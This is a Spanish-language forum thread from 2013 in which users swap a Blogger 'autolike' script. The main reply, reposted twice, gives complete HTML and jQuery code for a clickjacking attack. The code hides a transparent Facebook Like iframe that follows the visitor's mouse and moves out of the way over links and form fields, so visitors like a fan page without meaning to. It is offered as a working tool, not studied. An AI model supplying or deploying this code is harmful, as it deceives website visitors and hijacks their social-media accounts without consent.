¿Mejor auto likes para Facebook o Twitter en Blogger?

  • Autor Autor epsilo99
  • Fecha de inicio Fecha de inicio
epsilo99

epsilo99

1
Xi
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Ando buscando el mejor autolinke para facebook o twitter que fuencionen en blogger!

Si conocen alguno comenten.
Gracias.
 
yo tambien necesito uno si alguien conoce algo que ayude gracias
 
antes de <body> coloquen el siguiente fragmento HTML:

<!--AutoLike para fanpague primera parte -->
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js' type='text/javascript'>
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>
<!--Fin AutoLike para fanpague primera parte -->

Por ultimo antes de </body> coloca lo siguiente, pero en esta parte deberás sustituir donde dice "tufanpage" por el nombre de tu fan page:
<!--AutoLike para fan page segunda parte -->
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid😀XImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'>
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Ftufanpage&amp;send=false&amp;layout=standard&amp;width=450&amp;show_faces=false&amp;font&amp;colorscheme=light&amp;action=like&amp;height=35&amp;appId=177279422401731" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:35px;" allowTransparency="true"></iframe>
</div>
<script type='text/javascript'>
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
<!--Fin AutoLike para fan page segunda parte -->
 
amigo una duda no pillo body :s ><
 
amigo una duda no pillo body :s ><

expandir artilugios en la plantilla, busca bien. demo del codigo donde funciona Blog de prueba

---------- Post agregado el 21-abr-2013 hora: 22:04 ----------

amigo una duda no pillo body :s ><

expandir artilugios en la plantilla, busca bien. demo del codigo donde funciona Blog de prueba

---------- Post agregado el 21-abr-2013 hora: 22:08 ----------

amigo una duda no pillo body :s ><

expandir artilugios en la plantilla, busca bien. demo del codigo donde funciona Blog de prueba
 
el problema que la nueva interface no me aparece o no se donde esta 🙁

---------- Post agregado el 22-abr-2013 hora: 03:40 ----------

me sale este error amigo : Error al analizar XML, línea 3400, columna 146: The entity name must immediately follow the '&' in the entity reference
 
antes de <body> coloquen el siguiente fragmento HTML:
Insertar CODE, HTML o PHP:
<!--AutoLike para fanpague primera parte -->
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js' type='text/javascript'>
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>
<!--Fin AutoLike para fanpague primera parte -->

Por ultimo antes de [COLOR="#FF0000"]</body> [/COLOR]coloca lo siguiente, pero en esta parte deberás sustituir donde dice "[COLOR="#FF0000"]tufanpage[/COLOR]" por el nombre de tu fan page:
 <!--AutoLike para fan page segunda parte -->
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'>
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2F[COLOR="#FF0000"]tufanpage[/COLOR]&send=false&layout=standard&width=450&show_faces=false&font&colorscheme=light&action=like&height=35&appId=177279422401731" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:35px;" allowTransparency="true"></iframe>
</div>
<script type='text/javascript'>
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
<!--Fin AutoLike para fan page segunda parte -->
Gracias por el code yo tenia uno que encontre por Google que hacie el Boton Gigante 😛8:
saludos
 
El mismo que se aplica en blogger se puede aplicar en cualquier web creo
 
Pues como veo ya te dieron el codigo, gracias por el que lo compartió!
 
aun no puedo hacerlo funcionar a alguien le funciono?
 
antes de <body> coloquen el siguiente fragmento HTML:

<!--AutoLike para fanpague primera parte -->
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js' type='text/javascript'>
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>
<!--Fin AutoLike para fanpague primera parte -->

Por ultimo antes de </body> coloca lo siguiente, pero en esta parte deberás sustituir donde dice "tufanpage" por el nombre de tu fan page:
<!--AutoLike para fan page segunda parte -->
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid😀XImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'>
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Ftufanpage&send=false&layout=standard&width=450&show_faces=false&font&colorscheme=light&action=like&height=35&appId=177279422401731" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:35px;" allowTransparency="true"></iframe>
</div>
<script type='text/javascript'>
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
<!--Fin AutoLike para fan page segunda parte -->

esta exelente, pero el me gusta lo persigue siempre?

o sea si tiene el facebook abierto ya no le aparece mas después, da clic y listo?

que pasa si no tiene el facebook abierto?

aclaro que ya se que en el original no se ve

saludos
 
Atrás
Arriba